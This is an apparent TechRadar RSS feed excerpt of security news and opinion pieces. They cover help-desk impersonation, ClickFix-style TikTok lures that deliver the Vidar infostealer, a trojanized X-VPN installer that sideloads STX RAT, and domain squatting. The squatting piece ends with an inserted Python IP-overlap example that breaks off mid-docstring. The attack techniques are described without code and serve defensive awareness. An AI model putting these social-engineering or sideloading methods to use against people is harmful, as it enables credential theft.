Agentic AI does not render ZTA useless, but its autonomous behavior means ZTA systems need to become more context-aware and adaptive in order to govern machine-driven interactions in real time.</p><p><a href="https://www.techradar.com/best/best-patch-management-tools"><em>We feature the best patch management software</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing, find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Why your help desk is still your biggest security risk ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/why-your-help-desk-is-still-your-biggest-security-risk</link>
                                                                            <description>
                            <![CDATA[ Help desks are your biggest security risk. AI fuels identity's critical vulnerability. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">iwfL78WFPbwvp3oM6SzY3B</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 15 Jun 2026 10:23:43 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Greg Nelson ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:description>                                                            <media:text><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:text>
                                <media:title type="plain"><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>When MGM Resorts suffered a crippling cyberattack in 2023, forensic teams expected to find sophisticated <a href="https://www.techradar.com/best/best-malware-removal">malware</a> or a zero-day exploit. Instead, they discovered something far simpler: an attacker called the help desk, impersonated an employee, and was handed the keys to the kingdom. Marks & Spencer and Harrods fell victim to similar attacks in 2025. </p><p>This pattern reveals a harsh reality – organizations spend millions hardening networks and endpoints while leaving identity, their most vulnerable entry point, completely exposed.</p><p>What's changed is not that help desks are vulnerable. <a href="https://www.techradar.com/news/best-internet-security-suites">Security</a> teams have known this for years. What's new is the convergence of two forces that have turned a known weakness into an urgent crisis.</p><p>Help desks make sure that locked-out <a href="https://www.techradar.com/best/best-employee-scheduling-software">employees</a> can get back to work as quickly as possible. However, the pressure to restore productivity creates an environment where speed often trumps security.</p><p>The typical interaction follows a predictable path: the caller provides basic identifying information, explains why they need access, and receives credentials. For an attacker who has done minimal reconnaissance on LinkedIn or company websites, this is trivial to replicate.</p><p>This attack vector is particularly dangerous because it bypasses most security controls like firewalls, endpoint detection, and network monitoring. These measures are blind to an attacker who talks their way through the front door with legitimate credentials issued by your own staff.</p><h2 id="why-this-old-problem-demands-new-urgency">Why this old problem demands new urgency</h2><p>Artificial intelligence has lowered the barrier for social engineering attacks. 
An attacker just needs the right tools and basic information to create real damage. The U.S. Department of Health and Human Services has warned that adversaries are using AI voice impersonation to target hospital help desks.</p><p>Accelerated by AI, phishing and spoofing scams increased by over 85%, and the average financial losses have more than doubled from $1,000 to $2,060.</p><p>At the same time, most organizations have embraced zero-trust principles for network access while performing only perfunctory security checks on help desk interactions. An employee accessing a file server goes through multiple verification steps.</p><p>An unknown caller asking the help desk to reset that same employee's <a href="https://www.techradar.com/best/password-generator">password</a> may face nothing more than security questions with answers easily found online.</p><h2 id="three-best-practices-for-help-desk-security">Three best practices for help desk security</h2><p>The most common pushback to strengthening <a href="https://www.techradar.com/best/best-helpdesk-software">help desk</a> security is operational. What happens when an executive loses their phone while traveling? What if an employee legitimately cannot access their registered device?</p><p>The answer is tiered response protocols combined with three interconnected controls that close the help desk vulnerability gap:</p><p><strong>1. Harden identity operations</strong>. Every access request should trigger the same verification standards. Multi-factor authentication cannot be optional or easy to bypass.</p><p>Implement passwordless, phishing-resistant authentication methods using industry standards. However, even passwordless systems can be compromised if credential recovery and enrollment processes remain vulnerable to social engineering.</p><p>Security questions based on static information should be replaced with dynamic verification that is harder to research or guess. 
Conduct regular identity governance reviews to eliminate stale accounts and ensure no identity has more access than necessary.</p><p><strong>2. Tie device enrollment to identity. </strong>When you reset credentials or restore access, verify that the receiving device belongs to the legitimate user. Device-bound passkeys cryptographically tie <a href="https://www.techradar.com/best/best-authenticator-apps">authentication</a> to a specific physical device and cannot be synced or transferred. This provides stronger assurance than synced passkeys, which can move between devices.</p><p>An attacker cannot call in, get a password reset, and access systems from an unmanaged device. The device need not be corporate-owned, but it must be registered and verified as part of the user's identity profile. Requiring this device-bound verification for any credential change immediately narrows the attack surface.</p><p><strong>3. Use bi-directional verification to keep both employees and help desks secure</strong>. Both parties need the ability to verify each other, depending on who initiates contact. When a user contacts the help desk, the agent should verify their identity before taking action.</p><p>Before resetting credentials or granting access, use callbacks to registered numbers or send verification codes to registered devices. This protects against attackers impersonating employees, as seen in the MGM and Harrods breaches. When the help desk reaches out to users, employees should have a way to verify the legitimacy of the contact before sharing any information.</p><p>This protects staff from scammers posing as IT support. Verification capability in both directions ensures neither help desk personnel nor employees become vulnerable entry points for attackers.</p><h2 id="tiered-response">Tiered response</h2><p>Apply these controls using tiered response protocols. Proceed with standard verification for low-risk requests (password hints, account status checks). 
For high-risk actions (credential resets, permission changes, device enrollments), require elevated verification.</p><p>For truly urgent situations, establish escalation paths that maintain security. A traveling executive who lost their <a href="https://www.techradar.com/news/best-business-smartphone">phone</a> should contact their direct manager for verification before support acts. An employee with a broken device should visit IT in person with identification.</p><p>These controls are most effective when they work together. <a href="https://www.techradar.com/best/best-identity-management-software">Identity</a> verification without device verification leaves gaps, while device verification without hardened identity operations can be circumvented. Both are undermined if help desk workflows bypass these controls in the name of convenience.</p><p>Technology alone cannot solve a people problem, but it can make the right behaviors easier and the wrong behaviors harder. Help desks will always be targets because they control access.</p><p>The question is whether organizations will continue treating them as trusted channels immune to compromise, or recognize them as the critical security control points they have become.</p><p>Breaches will continue. Attackers will keep calling. 
But organizations that recognize help desks as the critical identity control points they are, and secure them accordingly, can finally close the door that's been left open for too long.</p><p><a href="https://www.techradar.com/news/best-endpoint-security-software"><em>We've featured the best endpoint protection software.</em></a></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing, find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Looking for simple antivirus protection that doesn't break the bank? — Norton Antivirus Plus is the lightweight protection package I have always dreamed of ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/looking-for-simple-antivirus-protection-that-doesnt-break-the-bank-norton-antivirus-plus-is-the-lightweight-protection-package-i-have-always-dreamed-of</link>
                                                                            <description>
                            <![CDATA[ Pick up Norton Antivirus Plus for just £25 in this limited time deal ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">5LioA3WmWpqpw8RmSN6ww9</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/HvvDv8tDpCrsxxMSxEevR5-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 12 Jun 2026 15:58:40 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                <author><![CDATA[ benedict.collins@futurenet.com (Benedict Collins) ]]></author>                    <dc:creator><![CDATA[ Benedict Collins ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/jEvqGv8wvH7PWZ4XPURyyB.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/HvvDv8tDpCrsxxMSxEevR5-1280-80.jpg">
                                                            <media:credit><![CDATA[Future]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A deal showing a price cut on Norton Antivirus Plus]]></media:description>                                                            <media:text><![CDATA[A deal showing a price cut on Norton Antivirus Plus]]></media:text>
                                <media:title type="plain"><![CDATA[A deal showing a price cut on Norton Antivirus Plus]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/HvvDv8tDpCrsxxMSxEevR5-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>I'm always on the lookout for antivirus that suits all device types, especially for those who are looking to make the most of their device and don't want any added bloat in their protection. This deal on <a href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank">Norton Antivirus Plus</a> is exactly that.</p><p>• <a href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank">See all Norton Antivirus Plus deals</a></p><p>This antivirus deal offers single device protection with a 38% discount - and includes a few extras such as 2GB Cloud Backup and a no-frills password manager.</p><p>Norton has also included its Scam Protection to defend against scams, and an AI Genie that acts as an insightful knowledge base for all things scam-related.</p><h2 class="article-body__section" id="section-today-s-top-norton-antivirus-plus-deal"><span>Today's top Norton Antivirus Plus deal</span></h2><div class="product"><a data-dimension112="5cddbf62-45c7-41b9-8209-709b56376018" data-action="Deal Block" data-label="Norton Antivirus Plus secures a single device against ransomware, malware, and online scams that plague the modern internet. You can also keep your credentials safe from hackers with the password manager, and secure important files in the 2GB cloud backup." data-dimension48="Norton Antivirus Plus secures a single device against ransomware, malware, and online scams that plague the modern internet. You can also keep your credentials safe from hackers with the password manager, and secure important files in the 2GB cloud backup." 
data-dimension25="£24.99" href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank" rel="nofollow"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:100.00%;"><img id="vgL7qHX627n345kfc7TRx8" name="norton logo" caption="" alt="" src="https://cdn.mos.cms.futurecdn.net/vgL7qHX627n345kfc7TRx8.jpg" mos="" align="middle" fullscreen="" width="1000" height="1000" attribution="" endorsement="" credit="" class=""></p></div></div></figure></a><p>Norton Antivirus Plus secures a single device against ransomware, malware, and online scams that plague the modern internet. You can also keep your credentials safe from hackers with the password manager, and secure important files in the 2GB cloud backup.<a class="view-deal button" href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank" rel="nofollow" data-dimension112="5cddbf62-45c7-41b9-8209-709b56376018" data-action="Deal Block" data-label="Norton Antivirus Plus secures a single device against ransomware, malware, and online scams that plague the modern internet. You can also keep your credentials safe from hackers with the password manager, and secure important files in the 2GB cloud backup." data-dimension48="Norton Antivirus Plus secures a single device against ransomware, malware, and online scams that plague the modern internet. You can also keep your credentials safe from hackers with the password manager, and secure important files in the 2GB cloud backup." 
data-dimension25="£24.99">View Deal</a></p></div><p>Norton Antivirus Plus is a non-intrusive, lightweight way to enhance your personal security with its no-frills protection.</p><p>We regularly test and review Norton's antivirus protection, and double-check our testing against third-party results from <a href="https://av-comparatives.org/vendors/norton/" target="_blank" rel="nofollow">AV-Comparatives</a> and <a href="https://www.av-test.org/en/antivirus/home-windows/windows-11/february-2026/norton-norton-360-25.12-261116/" target="_blank" rel="nofollow">AV-TEST</a>. In both cases, it scores top marks.</p><p>The included 10GB of cloud backup is the perfect place to ensure you have a second copy of your important documents.</p><p>The included Scam Detection proactively searches for hidden threats in phishing emails or other scams, and gives you a heads-up when they are detected.</p><p>Norton Antivirus Plus is currently £25 for the first year, and auto-renews at the standard price.</p><ul><li><a href="https://www.techradar.com/best/best-antivirus" target="_blank">Take a look at our full guide to the best antivirus software</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Hackers are using TikTok videos offering 'free Spotify Premium' to spread malware and steal passwords ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/hackers-are-using-tiktok-videos-offering-free-spotify-premium-to-spread-malware-and-steal-passwords</link>
                                                                            <description>
                            <![CDATA[ Videos advertising free subscriptions are leading victims away to download and install malware via command-line tools. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">KyiMnDdJEodaXo9D6zhJN8</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/fg7bgy65pWhFo4Qzib58yX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 11 Jun 2026 16:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Craig Hale ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/GV8qRsHBkpSAQxiYKjTt6H.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/fg7bgy65pWhFo4Qzib58yX-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Phishing, E-Mail, Network Security, Computer Hacker, Cloud Computing Cyber Security 3d Illustration]]></media:description>                                                            <media:text><![CDATA[Phishing, E-Mail, Network Security, Computer Hacker, Cloud Computing Cyber Security 3d Illustration]]></media:text>
                                <media:title type="plain"><![CDATA[Phishing, E-Mail, Network Security, Computer Hacker, Cloud Computing Cyber Security 3d Illustration]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/fg7bgy65pWhFo4Qzib58yX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>TikTok and Instagram Reels now being used to target victims</strong></li><li><strong>"Free" Spotify, Microsoft, Adobe subscriptions targeting cash-strapped users</strong></li><li><strong>Social engineering is still the top vector, but basic account security measures do a lot of the heavy lifting</strong></li></ul><p>A new report from <a href="https://www.reversinglabs.com/blog/social-media-attacks-phishing" target="_blank">ReversingLabs</a> is warning doomscrollers of videos spreading across short-form platforms like TikTok and Instagram Reels infecting users with password-stealing malware.</p><p>The videos typically promise free access to subscriptions like Spotify Premium, Windows, Office and Adobe – an instant, telltale sign that things might not be as they seem.</p><p>Instead of receiving phishing emails, victims are instructed to open command-line tools like PowerShell, then paste and run the command shown in the video.</p><h2 id="watch-out-for-this-info-stealing-malware">Watch out for this info stealing malware</h2><p>When they run the command, it triggers a piece of malware to be downloaded and installed to a victim's computer. Vidar, the infostealer, targets usernames, passwords, cookies, session tokens, cryptocurrency wallet data, personal files and documents, and other sensitive information.</p><p>But more importantly, it marks a significant change – previously, email phishing campaigns have been extremely popular for gaining access to victims' credentials, with a simple click of a link leading to potential disaster. 
This newer method relies on victims manually entering commands into a tool, which requires more patience.</p><p>Ultimately, the attack exploits current economic strains and the fact that consumers are looking out for cheap and free alternatives to popular subscriptions.</p><p>"This kind of social engineering is an easy way for threat actors to drive traffic off social media and onto an attacker-controlled malicious website," the researchers wrote.</p><p>Regardless, the overarching theme is that social engineering remains the clearest path for attackers to reach victims, and that's good news because there are many basic principles would-be victims can follow, like using multi-factor authentication to secure accounts.</p><p>Being wary of suspiciously cheap or free products/services and only downloading software from official vendors would also help in this instance.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Fake X-VPN installers found to spread credential-stealing malware — here's how to stay safe ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/vpn/vpn-privacy-security/fake-x-vpn-installers-found-to-spread-credential-stealing-malware-heres-how-to-stay-safe</link>
                                                                            <description>
                            <![CDATA[ Researchers found a trojanized X-VPN installer used to deploy STX RAT malware. X-VPN itself was not breached, and only attacker-hosted downloads are affected. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">U7ZvbWfADGzg973ugNchhG</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/5pmsJs3KfnrtbsM98UsnG9-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 10 Jun 2026 09:30:44 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[VPN Privacy &amp; Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[VPN]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                                                                <author><![CDATA[ monicajwrites@gmail.com (Monica J. White) ]]></author>                    <dc:creator><![CDATA[ Monica J. White ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/6AQ4y5nzk8kQ47Yp69GERj.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/5pmsJs3KfnrtbsM98UsnG9-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                        <media:description><![CDATA[Malware can cause chaos]]></media:description>                                                            <media:text><![CDATA[Android phone malware]]></media:text>
                                <media:title type="plain"><![CDATA[Android phone malware]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/5pmsJs3KfnrtbsM98UsnG9-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Fake X-VPN installer found to deploy credential-stealing malware</strong></li><li><strong>X-VPN was not hacked; only those downloading the fake app were affected</strong></li><li><strong>First targeting crypto traders, criminals widened to privacy-minded users</strong></li></ul><p>A new report has uncovered an uncomfortable truth for anyone who downloads software from somewhere other than the official source: a trusted-looking app can be weaponized against you.</p><p>Threat researchers at <a href="https://www.cyderes.com/howler-cell/cpuid-hwmonitor-xvpn-dll-sideloading-stx-rat" target="_blank" rel="nofollow">Cyderes</a> have been tracking an active campaign that uses a fake X-VPN installer to deploy <a href="https://www.techradar.com/news/what-is-malware-and-how-dangerous-is-it">malware</a> known as the STX RAT, which steals credentials and hands attackers remote control of an infected machine.</p><p>Crucially, this is not a breach of <a href="https://www.techradar.com/reviews/x-vpn">X-VPN</a>, a provider that has just <a href="https://www.techradar.com/vpn/vpn-services/x-vpn-proves-its-privacy-credentials-with-new-independent-no-logs-audit">proved its privacy credentials</a> with an independent no-log audit. The company's official download channels were unaffected, and the only people at risk were those who installed a malicious copy from attacker-controlled sources. </p><p>This is a stark reminder that, even if you pick one of the <a href="https://www.techradar.com/vpn/best-vpn"><u>best VPN</u></a> services around, you still need to be careful with downloads. 
As <a href="https://www.techradar.com/vpn/vpn-privacy-security/google-issues-security-alert-your-vpn-app-could-be-spyware-in-disguise">Google warned</a> in its November 2025 fraud advisory, scammers are increasingly disguising malware as legitimate VPN apps to steal users' data.</p><h2 id="how-the-fake-x-vpn-attack-works">How the fake X-VPN attack works</h2><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:840px;"><p class="vanilla-image-block" style="padding-top:25.00%;"><img id="qNFfqSgU3XNq5a4do4hKra" name="X-VPN malware campaign" alt="Timeline of X-VPN malware campaign's evolution uncovered by Cyderes (June 2026)" src="https://cdn.mos.cms.futurecdn.net/qNFfqSgU3XNq5a4do4hKra.png" mos="" align="middle" fullscreen="" width="840" height="210" attribution="" endorsement="" class="inline"></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="credit" itemprop="copyrightHolder">(Image credit: Cyderes)</span></figcaption></figure><p>As <a href="https://www.cyderes.com/howler-cell/cpuid-hwmonitor-xvpn-dll-sideloading-stx-rat">Cyderes' findings</a> show, attackers took genuine X-VPN program files and slipped in one extra malicious file named CRYPTBASE.dll, a technique called DLL sideloading. </p><p>Because of a quirk in how Windows finds that file, the app appears to install normally while the hidden file injects the STX RAT malware straight into the computer's memory, leaving little trace for antivirus tools to catch.</p><p>Once active, STX RAT can harvest saved browser passwords and session tokens, collect system information, run commands remotely, and talk to its servers over ordinary encrypted web traffic, so it blends in. 
The fake VPN was one of 11 malicious packages tied to the operation, alongside trojanized installers for Binance, Bybit, MetaTrader 5, Exodus, and Steam.</p><p>The campaign began by targeting cryptocurrency traders, then pivoted to a trojanized X-VPN package to reach privacy-conscious users who often handle sensitive credentials. The same malware spread earlier through a brief compromise of the CPUID website, which Kaspersky linked to more than 150 victims across several countries and industries.</p><p>To its credit, X-VPN responded quickly, releasing Windows version 77.5.3 with hardened DLL loading controls. Users of the X-VPN app should update to that version or later.</p><h2 id="how-to-avoid-fake-vpn-apps">How to avoid fake VPN apps</h2><p>The good news is that the single most effective defense here is also the simplest and requires no technical skill. Most of these attacks fall apart the moment you refuse to download software from anywhere other than the official source.</p><p>Use the <strong>vendor's own website or an official app store</strong>, and avoid installers from third-party repositories or links sent to you. In this campaign, the files lived in an unknown Bitbucket repository.</p><p>There have been other cases of <a href="https://www.techradar.com/pro/criminals-are-using-a-dangerous-fake-free-vpn-to-spread-malware-via-github-heres-how-to-stay-safe">criminals using a fake free VPN to spread malware</a>, so <strong>treat suspiciously cheap apps as a red flag</strong>.</p><p><strong>Type the address yourself</strong> rather than clicking ads or search results, which avoids look-alike sites.</p><p><strong>Keep software updated</strong> and run reputable <strong>security software</strong> for an extra layer of protection. 
Because STX RAT runs in memory and tries to evade detection, a modern <a href="https://www.techradar.com/best/best-antivirus">antivirus</a> or endpoint tool gives you an extra layer of protection alongside good download habits.</p><p>If you think you installed a fake VPN, assume your passwords and sessions may be exposed. <strong>Change important passwords</strong> from a clean device, <strong>sign out everywhere</strong>, and <strong>turn on two-factor authentication</strong>. A VPN is a valuable privacy tool, but only when you install the genuine article from a source you can trust.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Someone is impersonating our business: 5 ways to fight digital squatting ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/someone-is-impersonating-our-business-5-ways-to-fight-digital-squatting</link>
                                                                            <description>
                            <![CDATA[ Digital squatting now moves money, steals login credentials, and pulls customers toward infrastructure tied to cybercrime. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">eVtcz5aho6LqQe99CwSdwf</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/5rDPr5xYvLwnkP7ZvpR2w3-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 05 Jun 2026 06:54:32 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Vaidotas Juknys ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/5rDPr5xYvLwnkP7ZvpR2w3-1280-80.jpg">
                                                            <media:credit><![CDATA[sarayut Thaneerat/ via Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Caution sign data unlocking hackers. Malicious software, virus and cybercrime, System warning hacked alert, cyberattack on online network, data breach, risk of website]]></media:description>                                                            <media:text><![CDATA[Caution sign data unlocking hackers. Malicious software, virus and cybercrime, System warning hacked alert, cyberattack on online network, data breach, risk of website]]></media:text>
                                <media:title type="plain"><![CDATA[Caution sign data unlocking hackers. Malicious software, virus and cybercrime, System warning hacked alert, cyberattack on online network, data breach, risk of website]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/5rDPr5xYvLwnkP7ZvpR2w3-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>A couple of years ago, someone searching for our company found a website that looked like ours, used a version of our name, and sold proxies we had nothing to do with. </p><p>The impersonators were already operating before we rebranded from Smartproxy to <a href="https://www.techradar.com/reviews/smartproxy">Decodo</a> in April 2025. </p><p>They registered smartproxy.org and smartproxy.cn to catch the traffic searching for the original domain name, and the rebrand gave them an even larger pool of people who had not heard about the change.</p><p>In 2025, the World Intellectual Property Organization handled 6,282 domain name disputes, a record for the organization. Cybersquatting cases have risen 68% since 2020. </p><p>Digital squatting now moves money, steals login credentials, and pulls customers toward infrastructure tied to cybercrime. Here are five things we did, and five things any business can do, when someone copies your brand.</p><h2 id="what-digital-squatting-is-and-why-cases-keep-climbing">What digital squatting is, and why cases keep climbing</h2><p>Digital squatting means registering or using a domain name in bad faith to profit from someone else's trademark. A bad actor registers a domain close to an established brand, then uses it to intercept traffic, collect payments for services they never deliver, harvest login credentials, or push <a href="https://www.techradar.com/best/best-malware-removal">malware</a>. Most victims find out only after their money disappears. </p><p>Squatting comes in a few common forms:</p><p>1. Typosquatting registers misspellings of popular domains, such as gooogle.com instead of google.com;</p><p>2. Combosquatting adds a keyword to a real brand name, producing domains like brand-login.com or brand-deals.com; </p><p>3. TLD squatting takes the same brand name across .org, .net, .io, and .ai;</p><p>4. 
Homograph attacks swap in visually identical characters from other alphabets, like a Cyrillic "а" for a Latin "a".</p><h2 id="when-it-happened-to-us">When it happened to us</h2><p>We met digital squatting as the target, not the observer. We operated as Smartproxy for seven years, and over that time, the name picked up enough recognition for impersonators to want it. They registered the .org and .cn domains, which have no connection to our company, our infrastructure, or our team. The site copies a version of our former name and sells <a href="https://www.techradar.com/best/best-free-proxies">proxies</a> we have nothing to do with, catching traffic from people who searched for Smartproxy.</p><p>The squatting also shaped how we could operate in China. The obvious domains were already taken, so before the rebrand, we had to run our China presence under a separate name, smartdaili.cn. A customer in that market searching for the brand could land on an impostor site first. </p><p>The rebrand to Decodo did not end the problem. It added a fresh group of people who knew the old name and never heard about the change, which is exactly who the lookalike domains target. The harm reached real customers, and we saw it in their complaints to us. </p><p>Trustpilot reviews describe people who paid the lookalike sites, sent irreversible cryptocurrency payments, received poor support, and got low-quality service under a name they trusted.</p><h2 id="what-the-proxyway-research-found">What the Proxyway research found</h2><p>The case changed shape when researchers tested the impersonator's <a href="https://www.techradar.com/best/best-product-management-apps-of-year">product</a> directly. The independent researchers at Proxyway purchased a standard weekly unlimited residential plan on smartproxy.org, the same product any retail buyer can get, and measured where its traffic actually exited. The method is one any paying customer could repeat, which is part of why the result carries weight. 
</p><p>Proxyway sent roughly 6.96 million HTTP requests through the plan across one week, with each request landing on an <a href="https://www.techradar.com/news/best-endpoint-security-software">endpoint</a> that logged the exit <a href="https://www.techradar.com/best/best-ip-address-tools">IP address</a>. After removing duplicates, the pool showed 2,023,029 unique IPs, of which 2,019,488 were IPv4, and 3,541 were IPv6. The success rate sat at 90.25%, in line with what the service advertised. </p><p>To find where those IPs came from, Proxyway compared the pool against a reference dataset of 16,192,293 verified IPIDEA exit nodes, observed over the 30 days ending January 29, 2026. Antoine Vastel, VP of Research at DataDome, built that dataset by routing traffic through IPIDEA endpoints himself and confirming each address as a working exit node, rather than relying on <a href="https://www.techradar.com/best/best-online-marketing-services">marketing</a> claims. IPIDEA is the residential proxy network that Google's Threat Intelligence Group disrupted back in January. </p><p>The comparison surfaced 773,087 IPs present in both pools. That figure equals 38.21% of the smartproxy.org pool and 4.77% of the IPIDEA dataset. 
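</p><p>The comparison just described, as an added example that is not Proxyway's or DataDome's code: it parses a constructed exit-IP log, deduplicates, splits IPv4 from IPv6, intersects the pool with a constructed stand-in for the verified reference set, and reports the intersection as a share of each pool. It also puts a number on "statistical anomaly" by computing how many addresses two independent uniform samples of the IPv4 space would be expected to share, applied to the article's published pool sizes. The log format, the sample lines and the reference addresses are assumptions made for the demo.</p>

```python
"""Exit-IP pool overlap check, modelled on the Proxyway/Vastel comparison.

Added example, not Proxyway's or DataDome's code. The log format, the sample
lines and the stand-in reference set are constructed for this demo.
"""
import ipaddress
from collections import Counter

# Constructed endpoint log: "<timestamp> <exit_ip> <http_status>" per request.
# Repeats, a proxy error and a malformed address are included on purpose.
SAMPLE_LOG = """\
2026-01-20T10:00:01Z 203.0.113.10 200
2026-01-20T10:00:02Z 203.0.113.10 200
2026-01-20T10:00:03Z 198.51.100.7 200
2026-01-20T10:00:04Z 2001:db8::1 200
2026-01-20T10:00:05Z 203.0.113.44 407
2026-01-20T10:00:06Z not-an-ip 200
2026-01-20T10:00:07Z 192.0.2.9 200
2026-01-20T10:00:08Z 2001:db8::1 200
"""

# Constructed stand-in for a verified reference set of another network's exits.
REFERENCE_NODES = "203.0.113.10 203.0.113.99 192.0.2.9 198.51.100.200 2001:db8::1"


def parse_exit_ips(log_text):
    """Unique, well-formed exit addresses seen on successful (2xx) requests.

    A proxy-side error such as 407 says nothing about where traffic would have
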